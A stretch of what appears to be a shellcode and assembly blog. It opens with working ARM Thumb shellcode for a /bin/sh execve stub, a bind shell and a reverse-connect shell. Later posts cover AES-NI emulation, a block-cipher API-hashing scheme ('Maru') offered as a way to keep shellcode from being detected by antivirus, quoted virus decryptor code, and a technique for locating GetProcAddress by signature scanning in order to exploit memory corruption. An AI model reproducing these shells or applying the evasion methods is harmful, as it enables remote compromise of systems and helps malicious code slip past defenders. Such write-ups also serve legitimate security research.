    .code 16
    // execve("/bin/sh", NULL, NULL);
    eor    r2, r2, r2     // r2 = NULL    
    push   {r0, r1, r2}   // save string + null bytes
    mov    r0, sp         // r0 = "/bin//sh", 0
    eor    r1, r1, r1     // r1 = NULL
    mov    r7, #11        // r7 = execve
    svc    1

Bind Shell

// 104 bytes
    .arch armv6
    .global _start

    .code 32
    ldr    r4, =#0xD402FF02 // htons(1234), AF_INET
    ldr    r5, =#0x6e69622f // /bin
    ldr    r6, =#0x68732f2f // //sh
    // switch to thumb mode
    add    r3, pc, #1
    bx     r3 
    .code 16
    // s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    eor    r2, r2, r2   // r2 = IPPROTO_IP
    mov    r1, #1       // r1 = SOCK_STREAM
    lsl    r7, r1, #8   // r7 = 1*256
    add    r7, #25      // r7 = 281 = socket 
    mov    r0, #2       // r0 = AF_INET
    svc    1
    mov    r8, r0       // r8 = s
    // bind(s, &sa, sizeof(sa)); 
    mov    r1, r4 
    push   {r1, r2}     // save sa on stack
    mov    r1, sp       // r1 = &sa
    strb   r2, [r1, #1] // null the 0xFF in 
    mov    r2, #16      // sizeof(sa) 
    add    r7, #1       // r7 = 281+1 = 282 = bind
    svc    1
    // listen(s, 1);
    mov    r1, #1       // r1 = 1    
    mov    r0, r8       // r0 = s
    add    r7, #2       // r7 = 282+2 = 284 = listen 
    svc    1    
    // r = accept(s, 0, 0);
    eor    r2, r2, r2   // r2 = 0
    eor    r1, r1, r1   // r1 = 0
    mov    r0, r8       // r0 = s
    add    r7, #1       // r7 = 284+1 = 285 = accept    
    svc    1    
    mov    r8, r0       // r8 = r
    // dup2(r, FILENO_STDIN);
    // dup2(r, FILENO_STDOUT);
    // dup2(r, FILENO_STDERR);
    mov    r1, #3       // for 3 descriptors
    mov    r7, #63      // r7 = dup2 
    mov    r0, r8       // r0 = r
    sub    r1, #1 
    svc    1
    bne    c_dup        // while (r1 != 0)

    // execve("/bin/sh", NULL, NULL);
    mov    r7, r2 
    push   {r5, r6, r7}    
    mov    r0, sp       // r0 = "/bin/sh" 
    mov    r7, #11      // r7 = execve
    svc    1

Reverse Connect

Default sockaddr_in values are :, 1234, AF_INET

// 92 bytes
    .arch armv6
    .global _start


    .code 32
    ldr    r3, =#0xD402FF02 // htons(1234), AF_INET
    ldr    r4, =#0x0100007f //
    ldr    r5, =#0x6e69622f // /bin
    ldr    r6, =#0x68732f2f // //sh

    // switch to thumb mode    
    add    r0, pc, #1
    bx     r0 
    .code 16
    // s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    eor    r2, r2, r2  // r2 = IPPROTO_IP
    mov    r1, #1      // r1 = SOCK_STREAM
    mov    r0, #2      // r0 = AF_INET
    lsl    r7, r1, #8  // multiply by 256
    add    r7, #25     // 256+25 = socket
    svc    1

    mov    r8, r0       // r8 = s
    // connect(s, &sa, sizeof(sa));
    push   {r3, r4}     // save sa on stack
    mov    r1, sp       // r1 = &sa
    strb   r2, [r1, #1] // null the 0xFF in
    mov    r2, #16      // r2 = sizeof(sa)
    add    r7, #2       // r7 = 281+2 = connect
    svc    1
    // dup2(s, FILENO_STDIN);
    // dup2(s, FILENO_STDOUT);
    // dup2(s, FILENO_STDERR);
    mov    r1, #3      // for 3 descriptors
    mov    r7, #63     // r7 = dup 
    mov    r0, r8      // r0 = s
    sub    r1, #1      // decrease r1    
    svc    1
    bne    c_dup       // while (r1 != 0)

    // execve("/bin/sh", NULL, NULL);
    eor    r2, r2, r2 
    mov    r7, r2
    push   {r5, r6, r7}
    mov    r0, sp  
    mov    r7, #11       // r7 = execve
    svc    1
    nop                  // alignment by 4 bytes

view sources here

Posted in arm, assembly, pi, raspberry, security, shellcode | Tagged , , , , , | 1 Comment

Emulation of AESENC and AESENCLAST instructions in x86 assembly


aesenc and aesenclast are AES-NI instructions impelemented on the x86 architecture.

Recently, a well known cryptographer J.P Aumasson published code to emulate these instructions in C, which would be very useful for emulators, and virtual machines in general.

The combination of ShiftRows and SubBytes in one line inspired me to write an implementation in x86 assembly.

The following code is not optimized for speed nor does it counter against electromagnetic attacks.

Galois Multiplication

Used for the mix columns and substitution layers. Based on algorithm by Andreas Hoheisel.

uint32_t gf_mul2 (uint32_t w) {
    uint32_t t = w & 0x80808080;
    return ( (w ^ t ) << 1) ^ ( ( t >> 7) * 0x0000001B);

The assembly …

Sub Bytes

Derived from code here

uint8_t sub_byte (uint8_t x)
    uint8_t i, y=x, sb;

    if (x) {
      // calculate logarithm gen 3
      for (i=1, y=1; i != 0; i++) {
        y ^= gf_mul2(y);
        if (y == x) break;
      x = ~i;
      // calculate anti-logarithm gen 3
      for (i=0, y=1; i<x; i++) {
        y ^= gf_mul2(y);

    sb = y;
    for (i=0; i<4; i++) {
      y   = ROTL8(y, 1);
      sb ^= y;
    return sb ^ 0x63;

The assembly code, but bear in mind, it has no countermeasures to side channel attacks.

; *****************************   
; uint8_t sub_byte (uint8_t x)
; *****************************       
    test   al, al            ; if (x)
    xchg   eax, edx          ; y = x    
    jz     sb_l2
    ; calculate logarithm gen 3
    mov    bh, 1             ; i = 1
    mov    bl, 1             ; y = 1
    mov    al, bl            ; y ^= gf_mul2(y)
    call   gf_mul2
    xor    bl, al       
    cmp    bl, dl            ; if (y == x) break;
    jz     sb_lx
    inc    bh                ; i++
    jnz    sb_l0             ; i != 0
    ; calculate anti-logarithm gen 3
    xor    bl, bl            ; i = 0
    mov    dl, 1             ; y = 1
    xor    bh, -1            ; x = ~i (bitwise NOT doesn't affect ZF)
    jz     sb_l2    
    mov    al, dl            ; al = y
    call   gf_mul2
    xor    dl, al            ; y ^= gf_mul2(y)
    inc    bl                ; i++
    cmp    bl, bh            ; i < x 
    jnz    sb_l1             ; 
    mov    al, dl            ; if before sb_l0, dl is already zero
    mov    cl, 4             ; loop 4 times
    rol    dl, 1             ; y = ROTL8(y, 1);
    xor    al, dl            ; sb ^= y;
    loop   sb_l3 
    xor    al, 0x63          ; sb ^= 0x63
    mov    [esp+1ch], al    


These 2 are combined by using a parameter last
Simply set last to zero or one.

void aesenc (void *state, void *key, int last) {
    w128_t  *s, *k, v;
    uint32_t i, w;

    // sub bytes and shift rows
    for (i=0; i<16; i++) {    
      v.b[((((i >> 2) + 4 - (i & 3) ) & 3) * 4) + (i & 3)] = sub_byte(s->b[i]);
    // if not last round
    if (!last) {
      // mix columns
      for (i=0; i<4; i++) {
        w = v.w[i];
        v.w[i] = ROTR32(w,  8) ^ 
                 ROTR32(w, 16) ^ 
                 ROTL32(w,  8) ^ 
                 XT(ROTR32(w, 8) ^ w);
    // add round key
    for (i=0; i<4; i++) {
      s->w[i] = v.w[i] ^ k->w[i];

The x86 assembly code..

; **********************************   
; uint8_t aesenc (void *s, void *rk)
; **********************************       
    xor    ecx, ecx          ; i = 0     
    lea    esi, [esp+32+4]
    push   eax               ; save state
    xchg   eax, ebx          ; ebx = round key 
    lodsd                    ; eax = last
    pop    esi               ; esi = state   
    pushad                   ; v = alloc(32)
    mov    edi, esp          ; edi = v
    dec    eax               ; last--
    mov    al, [esi+ecx]     ; al = sub_byte(s[i])
    call   sub_byte
    mov    edx, ecx          ; edx = i
    mov    ebp, ecx          ; ebp = i
    shr    ebp, 2            ; ebp >>= 2
    and    edx, 3            ; edx &= 3
    sub    ebp, edx          ; ebp -= edx
    and    ebp, 3            ; ebp &= 3
    lea    edx, [edx+ebp*4]  ; edx = (edx + ebp * 4) 
    mov    [edi+edx], al     ; v.b[edx] = al
    inc    ecx               ; i++
    cmp    cl, 16            ; for (i=0; i<16; i++)
    jnz    subbytes_shiftrows
    jz     add_round_key    
    mov    cl, 4    
    mov    ebx, [edi]        ; w0 = v.w[i]
    mov    eax, ebx          ; w1 = ROTR32(w0, 8)
    ror    eax, 8
    mov    esi, eax          ; w2 = ROTR32(w0, 8)
    xor    eax, ebx          ; w1 ^= w0 
    call   gf_mul2
    xor    esi, eax          ; w2 ^= gf_mul2(w1)
    ror    ebx, 16           ; w0 = ROTR32(w0, 16)
    xor    esi, ebx          ; w2 ^= w0
    ror    ebx, 8            ; w0 = ROTR32(w0, 8)
    xor    ebx, esi          ; w0 ^= w2
    xchg   ebx, eax          ; eax = w0
    stosd                    ; v.w[i] = eax
    loop   mix_columns
add_round_key:               ; for (i=0; i<16; i++) {
    mov    al, [edi]         ;   al = v.b[i] 
    xor    al, [ebx]         ;   al ^= rk[i]
    inc    ebx               ;   
    mov    [esi], al         ;   s[i] = al
    cmpsb                    ;   
    loop   add_round_key     ; }
    popad                    ; release memory
    popad                    ; restore registers

The size of assembly code is 195 bytes. Approximately 300 for C generated assembly.

See original code by Aumasson here

Posted in assembly, cryptography, encryption, security | Tagged , , , , , , , | Leave a comment

Shellcode: Windows API hashing with block ciphers ( Maru Hash )


String/Pattern Matching Algorithms are by far the most popular and easy way to detect a shellcode. The principle is simple: all codes have unique characteristics which can be used as signatures to identify in memory.

Even shellcodes with no prior analysis can contain some known value, or piece of code which at least makes it appear suspicious, and worthy of closer inspection.

The known values I’m referring to are of course API strings and hashes which have always been useful in detecting malicious code for 20+ years.

If we’re going to develop more advanced shellcodes that go undetected by modern AV solutions, we need to consider using a HLL like C or C++ along with unconventional programming that guarantees everything in a shellcode is permutable.

It’s not just the executable code that should be permutable, but the entire thing; code, data, constants, strings..everything.

What I show here today is how to create permutable API hashes using a hash function called Maru (Ma-roo), named after the Japanese cat.

Maru uses a block cipher to generate a hash of string. You don’t have to use a block cipher for this, but a cryptographic primitive can help protect the hashes against collision attacks found using Satisfiability Modulo Theories (SMT).

For more information, read Using SAT and SMT to defeat simple hashing algorithms

Also, read the section on cryptography in Quick introduction into SAT/SMT solvers and symbolic execution


**WARNING: Maru is not a cryptographic hash, and should not be used for applications where a secure hash algorithm is required.**

Signature detection

When viruses for MS-DOS started to appear 30 years ago, detection by signature was relatively simple.

In an attempt to hide code, authors used a simple XOR operation with an 8-bit value. For example, the ‘Skism Rythem Stack Virus-808‘ from 1991 used milliseconds of the current time to “encrypt” each new infection, so it would appear differently for 100 versions.

This is the entry point of that code, and its “decryption” process.

jmp    virus_start

encrypt_val db 00h


    call   encrypt         ; encrypt/decrypt file
    jmp    virus           ; go to start of code


    push   cx
    mov    bx, offset virus_code ; start encryption at data

    mov    ch, [bx]        ; read current byte
    xor    ch, encrypt_val ; get encryption key
    mov    [bx], ch        ; switch bytes
    inc    bx              ; move bx up a byte
    cmp    bx,  offset virus_code + virus_size
    ; are we done with the encryption
    jle    xor_loop        ; no? keep going
    pop    cx

Later in the code, the virus will update ‘encrypt_val’ using the milliseconds value of the current time.

    mov    ah, 2ch         ; get time
    int    21h

    mov    encrypt_val, dl ; save m_seconds to encrypt val so
                           ; theres 100 mutations possible

There’s some effort to hide the body of the virus here, but the decrypter is still visible and easily detected. Moreover, a scanner can emulate the decrypter routine, exposing the body of virus in memory before performing detection by signature.

When Win32 viruses started to appear in 1997, there were no longer MS-DOS interrupts. Instead there were API functions, accessible through dynamic libraries or DLL, and this made detecting malware even easier. Any code with a large block of API strings in it, was immediately going to raise alarm bells.

Authors eventually started to use 32-bit checksums, the most popular of which was CRC32. Later, LSD-PL inspired a trend of using some basic Add-Rotate-Xor routine, like the following that appeared in their WASM package.

i3: mov   esi,[4*eax+ebx]    ; ptr to symbol name
    add   esi,edx            ; rva2va

    push  ebx      ; hash: h=((h<<5)|(h>>27))+c
    push  eax
    xor   ebx,ebx
i4: xor   eax,eax  ; hash loop
    rol   ebx,5
    add   ebx,eax
    cmp   eax,0
    jnz   i4 
    ror   ebx,5 
    cmp   ebx,ecx  ; hash compare
    pop   eax
    pop   ebx
    je    i5       ; same: symbol found
    inc   eax
    jmp   i3       ; different: go to the next symbol

Most legitimate code doesn’t have to resolve an API by string or hash manually through Import Address Table (IAT) or Export Address Table (EAT) and if some code does behave this way, it’s usually up to no good.

What’s funny about API hashing; It was supposed to prevent signature detection of strings. So, instead of detecting by string, AV just detected the hash of an API string, which still makes it a perfectly valid signature.

Even the shellcodes generated by many popular payload tools (BeEF, Meterpreter, Veil) all use basic hashing algorithms with no entropy or randomization. They are consistently the same, thus are just as easy to detect as any API string itself.

Of course, these packages offer the ability to encrypt payloads with a stream or block cipher like RC4 or AES. Again though, even if it will pass a simple scan by AV or IDS, a more thorough analysis using an emulator can decrypt the main code and perform pattern matching afterwards, having no problem with detection.

Plain strings problem

Ideally, an attacker would want everything obfuscated/encrypted during compilation and decrypted at run-time without using additional tools or code.

constexpr is ideal for C++ code, but for C, there’s no such feature unless of course, a compiler can be modified to encrypt all strings at compile time?

Some assemblers such as MASM and NASM support macro based compilation, but are cumbersome to work with on complex functions. (not that you couldn’t)

Z0MBiE already discussed the problem of plain strings in Data Encoding In Meta Viruses and Solving Plain Strings Problem In HLL around 2002 which did somewhat “solve” the problem, but if you look closely at the sources, there’s insufficient entropy used.

At the time, he provided a library VirStr with TASM macros that worked with Borland’s C compiler, but these do not work with mingw, msvc or clang, and the library has never been updated since.

The purpose of using entropy for hashing of API strings is obviously to increase the difficulty of detecting a payload. It’s not enough to avoid detection forever, but it’s certainly better than existing hash algorithms with no entropy at all.

Hash function constructions

We can construct new hash algorithms from block ciphers, and these offer us the potential to use unique keys, thus generating completely different API hashes every time the key changes.

However, as you will see, very few block ciphers are suitable for lightweight applications such as shellcode.

Here are 3 potential constructions to use. (there are more, but only 3 are covered)

    • Davies–Meyer

H_i=E_{m_i}(H_{i-1})\oplus H_{i-1}

Feeds each block of the message (m_i) as the key to a block cipher. Feeds the previous hash value (H_{i-1}) as the plaintext to be encrypted.

The output ciphertext is then also XORed with the previous hash value (H_{i-1}) to produce the next hash value (H_i).

In the first round when there is no previous hash value it uses a constant pre-specified initial value (H_0).

    • Matyas–Meyer–Oseas

H_i=E_g{(H_{i-1})}(m_i)\oplus m_i

Feeds each block of the message (m_i) as the plaintext to be encrypted. The output ciphertext is then also XORed with the same message block (m_i) to produce the next hash value (H_i). The previous hash value (H_{i-1}) is fed as the key to the block cipher.

In the first round when there is no previous hash value it uses a constant pre-specified initial value (H_0).

    • Miyaguchi–Preneel

H_i = E_{g(H_{i-1})}(m_i)\oplus H_{i-1}\oplus m_i

Feeds each block of the message (m_i) as the plaintext to be encrypted. The output ciphertext is then XORed with the same message block (m_i) and then also XORed with the previous hash value (H_{i-1}) to produce the next hash value (H_i).

The previous hash value (H_{i-1}) is fed as the key to the block cipher.

In the first round when there is no previous hash value it uses a constant pre-specified initial value (H_0).

Choosing a block cipher

We know signature detections require some static value, and what better static values exist than cryptographic constants?

You can of course change them, but then it might affect security of the cipher. So, it’s better to choose a cipher that doesn’t use any constants, at all.

While looking at potential block ciphers, my top 3 were based on Add-Rotate-Xor (ARX) designs.

    • Speck

Designed by the NSA, and published in 2013. Wide range of key and block sizes for different architectures. Proven to be the smallest software based block cipher available for most architectures.

Parameters for x86: 64-bit block, 128-bit key. For x86-64: 128-bit block, 256-bit key. Both implemented in 64 and 86 bytes respectively.

Here’s the x86 code.

    • Chaskey-LTS

Designed and published in 2015. Uses an Even-Mansour design with permutation function of SipHash. 128-bit keys, 128-bit blocks. Can be implemented in approx. 90 bytes using x86 assembly.

    • XTEA

eXtended Tiny Encryption Algorithm. A Feistel cipher, published in 1997 after weaknesses found in TEA. 128-bit keys, and 64-bit block. Has a known constant, 0x9E3779B9 which makes it susceptible to signature based detection. Can be implemented in approx. 80 bytes.

Speck was just the better design for lightweight applications, and can’t be easily identified by signature. (at least not from any constants)


The padding used is similar to MD4. Instead of length in bits stored as 64-bit integer, only a 32-bit integer is used. Since it will never exceed 256-bits for Maru 1 or 512 bits for Maru 2, there didn’t seem any point using a 64-bit integer.

Speck Parameters

Version 1 is suitable for 32-bit architectures while version 2 is suitable for 64-bit.

Ver. Cipher Block Size Key Size
1 Speck 64 128
2 Speck 128 256

32-bit Architectures

The following is implementation of Speck for Ver. 1

uint64_t speck64_encrypt(const void *buf, const void *key)
    uint32_t x0, x1;
    uint32_t k0, k1, k2, k3;
    int      i, t;
    w64_t    r;

    w64_t    *x=(w64_t*)buf;
    w128_t   *k=(w128_t*)key;
    // load key
    k0 = k->w[0]; k1 = k->w[1];
    k2 = k->w[2]; k3 = k->w[3];

    // load data
    x0 = x->w[0]; x1 = x->w[1];

    for (i=0; i<27; i++) {
      // encrypt block
      x0 = (ROTR32(x0, 8) + x1) ^ k0;
      x1 =  ROTL32(x1, 3) ^ x0;
      // create next subkey
      k1 = (ROTR32(k1, 8) + k0) ^ i;
      k0 =  ROTL32(k0, 3) ^ k1;
      XCHG(k3, k2);
      XCHG(k3, k1);    
    // store result
    r.w[0] = x0; r.w[1] = x1;
    return r.q;    

64-bit architectures

The following is implementation for Ver.2

void speck128_encrypt(const void *in, const void *key, void *out)
    uint64_t x0, x1;
    uint64_t k0, k1, k2, k3;
    uint64_t i, t;

    w128_t   *x=(w128_t*)in;
    w128_t   *r=(w128_t*)out;
    w256_t   *k=(w256_t*)key;
    // load key
    k0 = k->q[0]; k1 = k->q[1];
    k2 = k->q[2]; k3 = k->q[3];

    // load data
    x0 = x->q[0]; x1 = x->q[1];

    for (i=0; i<34; i++) {
      // encrypt block
      x0 = (ROTR64(x0, 8) + x1) ^ k0;
      x1 =  ROTL64(x1, 3) ^ x0;
      // create next subkey
      k1 = (ROTR64(k1, 8) + k0) ^ i;
      k0 =  ROTL64(k0, 3) ^ k1;

      // rotate left 64-bits
      XCHG(k3, k2);
      XCHG(k3, k1);     
    // store result
    r->q[0] = x0; r->q[1] = x1;    

Maru Parameters

The numbers below (excluding Ver.) represent number of bits.

Ver. CPU Construction Padding Key Message Max. Input Output
1 32 Davies-Meyer Merkle-Damgard 64 128 256 64
2 64 Davies-Meyer Merkle-Damgard 128 256 512 128

There are 2 64-bit constants used to initialize H_0 which are not really of any significance.

I just wanted something “random” without using a random number generator. Here is how to generate them using SpeedCrunch.

The 2nd value shown is used to initialize H_0 in both versions. The n-bit seed is xor’d against these values to make the hash output different.

I’ve emphasized the importance of eliminating constants which are not really permutable, and can be used as signatures, so why use them here?

You don’t have to use them. I’m only using here for illustration, but you can generate your own values to initialize H_0 or just use zero instead.

Maru 1

The only real difference between the two would be cipher parameters and local capacity for keys. We use a 32-bit seed here to initialize H_0.

uint64_t maru (const char *key, uint32_t seed)
    w64_t     h;
    w128_t    m;
    uint32_t  len, idx, end;

    // initialize H with seed
    h.q = MARU_INIT_H ^ seed;
    for (idx=0, len=0, end=0; !end; ) {
      // end of string or max len?
      if (key[len]==0 || len==MARU_KEY_LEN) {
        // add end bit
        m.b[idx++] = 0x80;
        // zero remainder of M
        memset (&m.b[idx], 0, (MARU_BLK_LEN - idx));
        // have we space in M for len?
        if (idx >= MARU_BLK_LEN-4) {
          // no, update H with E
          h.q ^= E(&h, &m);
          // zero M
          memset (m.b, 0, MARU_BLK_LEN);
        // add total len in bits
        m.w[3] = (len * 8);
        idx = MARU_BLK_LEN;
      } else {    
        // add byte to M
        m.b[idx++] = (uint8_t)key[len++];
      if (idx == MARU_BLK_LEN) {
        // update H with E
        h.q ^= E(&h, &m);
        idx = 0;
    return h.q;

Maru 2

Here, we use a 64-bit seed. The 128-bit result is stored in out parameter.

void maru2(const char *key, uint64_t seed, void *out) 
    w128_t  h, c;
    w256_t  m;
    int     len, idx, end;

    // initialize H with seed
    h.q[0] = MARU2_INIT_B ^ seed;
    h.q[1] = MARU2_INIT_D ^ seed;
    for (idx=0, len=0, end=0; !end; ) {
      // end of string or max len?
      if (key[len]==0 || len==MARU2_KEY_LEN) {
        // add end bit
        m.b[idx++] = 0x80;
        // zero remainder of M
        memset (&m.b[idx], 0, (MARU2_BLK_LEN - idx));
        // have we space in M for len?
        if (idx >= MARU2_BLK_LEN-4) {
          // no, encrypt H
          E(&h, &m, &c);
          // update H
          h.q[0] ^= c.q[0];
          h.q[1] ^= c.q[1];          
          // zero M
          memset (m.b, 0, MARU2_BLK_LEN);
        // add total len in bits
        m.w[(MARU2_BLK_LEN/4)-1] = (len * 8);
        idx = MARU2_BLK_LEN;
      } else {    
        // add byte to M
        m.b[idx++] = (uint8_t)key[len++];
      if (idx == MARU2_BLK_LEN) {
        // encrypt H
        E(&h, &m, &c);
        // update H
        h.q[0] ^= c.q[0];
        h.q[1] ^= c.q[1];
        idx = 0;
    memcpy(out, &h, sizeof(h));    


Both versions performed well when tested with Robert G. Browns dieharder tool.

The tests involved setting a string buffer to all 1s and incrementing sequentially to generate hashes, similar to how one might test a PRNG.

  • Maru 1

  • Maru 2

Of course, just because the hash output passed dieharder tests, that doesn’t necessarily mean we have a good hash function, but it’s at the very least a good sign.

Example Hashes

  • Maru 1

  • Maru 2

As you can see above, once the seed value is changed, the hash output also changes.


We can construct better hashing algorithms for API strings from block ciphers. Maru isn’t intended for digital signatures or mission critical applications that requires robust collision resistant hashing functions, but it is good enough for hashing short strings like API.

Maru is really an idea about how to introduce entropy into the string hashing process, while trying to increase difficulty of string collisions.

You can see full source for Maru hash here.

About Maru the cat

Posted in assembly, programming, shellcode, windows | Tagged , , , , , | Leave a comment

Shellcode: The hunt for GetProcAddress


Recently revealed by Alex Ionescu, future releases of Windows will include Enhanced Mitigation Experience Toolkit (EMET) built into the kernel.

As more mitigation features appear in MSVC and the Windows operating system, the difficulty of locating API to exploit memory corruption vulnerabilities increases.

It got me thinking; If both the Import Address Table (IAT) and Export Address Table (EAT) are unavailable, what other ways can we resolve GetProcAddress for a Position Independent Code (PIC) ?

Surely there must be other ways?

What you see here is just some hours work and not extensive research into obtaining GPA when the IAT and EAT are inaccessible.

I don’t know how practical this idea would be in a real world scenario, but thought it was worth a quick post which might encourage others to find some alternatives.

Signature Detection

Every algorithm used to detect malware can be repurposed to detect arbitrary code including that of GetProcAddress.

Detection of malicious code can range from simple searching of strings, constants (including crypto) or sequences of code bytes to more advanced methods like emulation and statistical analysis.

Locating GetProcAddress by signature is trivial because it’s the only API that will return the error code: STATUS_ORDINAL_NOT_FOUND

From Windows NT up to Windows 10, there’s a high probability simply searching either kernel32.dll or kernelbase.dll for a function with this constant is enough to locate the entry point of GetProcAddress.

Search algorithm

Some pseudocode to describe search pattern:

for each DLL in PEB
  for each executable section in DLL
    scan forward in memory for STATUS_ORDINAL_NOT_FOUND
    if constant found
      scan backward in memory for prolog bytes
        if bytes found
        end if
    end if
  end for
end for

Simple enough in theory and for 32-bit legacy mode is effective.

However, it’s ineffective if GetProcAddress uses function chunking thus will not work for some DLL (specifically 64-bit versions).

On Windows 7, the location of our constant in kernelbase.dll appears inside a chunk of code.

Negating 0x3FFFFEC8 gives us 0xC0000138

On Windows 10, the location of constant is within the same GetProcAddress code thus entrypoint can be easily located via simple search.

To work with Win7, I would suggest a Length Disassembler Engine (LDE) in addition to emulating the relative jumps until you land in GetProcAddress again, but there are no LDE for 64-bit I know which would operate independently of memory. Maybe one isn’t needed?

Since we’re searching the sections of kernel32.dll or kernelbase.dll, let’s examine the PEs section header structure and what members we’re interested in.

typedef struct _IMAGE_SECTION_HEADER {
  union {
    DWORD PhysicalAddress;
    DWORD VirtualSize;
  } Misc;
  DWORD VirtualAddress;
  DWORD SizeOfRawData;
  DWORD PointerToRawData;
  DWORD PointerToRelocations;
  DWORD PointerToLinenumbers;
  WORD  NumberOfRelocations;
  WORD  NumberOfLinenumbers;
  DWORD Characteristics;
  • Misc.VirtualSize

The total size of the section when loaded into memory, in bytes. If this value is greater than the SizeOfRawData member, the section is filled with zeroes. This field is valid only for executable images and should be set to 0 for object files.

  • VirtualAddress

The address of the first byte of the section when loaded into memory, relative to the image base. For object files, this is the address of the first byte before relocation is applied.

  • Characteristics

The characteristics of the image. Since we’re looking for executable code, we can test this value for IMAGE_SCN_CNT_CODE or IMAGE_SCN_MEM_EXECUTE

Once we find an executable section, we perform a simple search for our signature, which in this case would be 4-byte sequence: 0x38, 0x01, 0x00, 0xC0

If found, we presume we’re in GetProcAddress code so we scan back in memory to find the prolog bytes which for 32-bit will be 0x55, 0x8B, 0xEC and 0x48, 0x89, 0x5C, 0x24, 0x08 for 64-bit.

// 32-bit prolog
"\x55"             /* push ebp           */
"\x8b\xec"         /* mov ebp, esp       */

Even though most 32-bit API since XP SP2 have mov edi, edi before prolog which is intended for hotpatching, we can in most cases skip it without any consequences.

// 64-bit prolog
"\x48\x89\x5c\x24\x08" /* mov [rsp+0x8], rbx */

Another potential way to find the entry point on 64-bit once we’ve found the signature is to look for padding added by the compiler. (some compilers differ in what padding is used)

Functions are aligned on a 16-byte boundary; padding is used before and after GetProcAddress.

On Windows 7, 0x90 is used, which is the x86 opcode for No operation (NOP)

On Windows 10, 0xCC is used, which is the opcode for a software interrupt (INT3)

This may be useful for searching with a different algorithm which is the only reason I mention it.

C code

For each DLL in the Process Environment Block (PEB)
Find either kernel32.dll or kernelbase.dll

LPVOID get_gpa (VOID)
  PPEB                  peb;
  PPEB_LDR_DATA         ldr;
  LPVOID                api_adr=NULL;
  DWORD                 i, h;
  BYTE                  c;
#if defined(_WIN64)
  peb = (PPEB) __readgsqword(0x60);
  peb = (PPEB) __readfsdword(0x30);

  ldr = (PPEB_LDR_DATA)peb->Ldr;
  // for each DLL loaded
  for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
       dte->DllBase != NULL && api_adr == NULL; 
    // is this kernel32.dll or kernelbase.dll?
    for (h=0, i=0; i<dte->BaseDllName.Length/2; i++) {
      c = dte->BaseDllName.Buffer[i];
      h += (c | 0x20);
      h = ROTR32(h, 13);
    if (h != 0xB1FC7F66 && h!= 0x22901A8D) continue;
    api_adr = scan_img(dte->DllBase); 
    if (api_adr != NULL) {
      printf ("\nGetProcAddress: %p", api_adr);
      printf ("\nGetProcAddress: %p\n", 
        GetProcAddress(dte->DllBase, "GetProcAddress"));      
  return api_adr;

For each executable section of this DLL

LPVOID scan_img (LPVOID base)
  BOOL                  is32;  
  PBYTE                 pRawData;
  DWORD                 i, len;
  LPVOID                gpa=NULL;

  dos  = (PIMAGE_DOS_HEADER)base;  
  nt   = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);  
  sec  = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader + 
  is32 = nt->FileHeader.Machine == IMAGE_FILE_MACHINE_I386;
  len  = nt->FileHeader.NumberOfSections;  
  // for each section
  for (i=0; i<len && gpa == NULL; i++) {    
    // is it executable?
    if (sec[i].Characteristics & IMAGE_SCN_MEM_EXECUTE) {
      pRawData = RVA2VA (PBYTE, base, sec[i].VirtualAddress);
      gpa = scan_section (pRawData, sec[i].Misc.VirtualSize, is32);
  return gpa;

Find the signature and scan backwards for the prolog bytes.

LPVOID scan_section (PBYTE memory, DWORD len, BOOL is32)
  DWORD  i, j, plen;
   // 4-byte signature 
  BYTE   sig[] = { 0x38, 0x01, 0x00, 0xC0 };
  // 3-byte prolog for 32-bit   
  BYTE   x32[] = { 0x55, 0x8B, 0xEC };
  // 4-byte prolog for 64-bit  
  BYTE   x64[] = { 0x48, 0x89, 0x5C, 0x24 };
  PBYTE  prolog, p;
  p      = memory;
  plen   = is32 ? sizeof(x32) : sizeof(x64);
  prolog = is32 ? x32 : x64;

  if (len <= sizeof(sig)) return NULL;
  // subtract size of signature 
  // so we don't cause an exception
  len -= sizeof(sig);
  for (i=0; i<len; i++) {
    // compare signature with current position
    if ((memcmp(sig, &p[i], sizeof(sig))==0)) {
      // try scanning backwards for prolog bytes
      for (j=i; j>=0; j--) {
        // found prolog bytes?
        if (memcmp(prolog, &p[j], plen)==0) {
          // return address
          ofs = (LPVOID)&p[j];
    if (ofs != NULL) break;
  return ofs;


Does it work? For majority of 32-bit mode OS, it works fine because STATUS_ORDINAL_NOT_FOUND is within the prolog and epilog of GetProcAddress code. Where it doesn’t work is on Windows 7 64-bit because the constant is outside.

  • Windows 7 32-bit
  • (good!)

The 1st address is off by 2-bytes, but that’s the MOV EDI, EDI instruction used for hotpatching and can be safely skipped over.

  • Windows 7 64-bit
  • (bad..)

  • Windows 10 64-bit
  • (good!)

Posted in assembly, programming, security, shellcode, windows | Tagged , , , , , | 3 Comments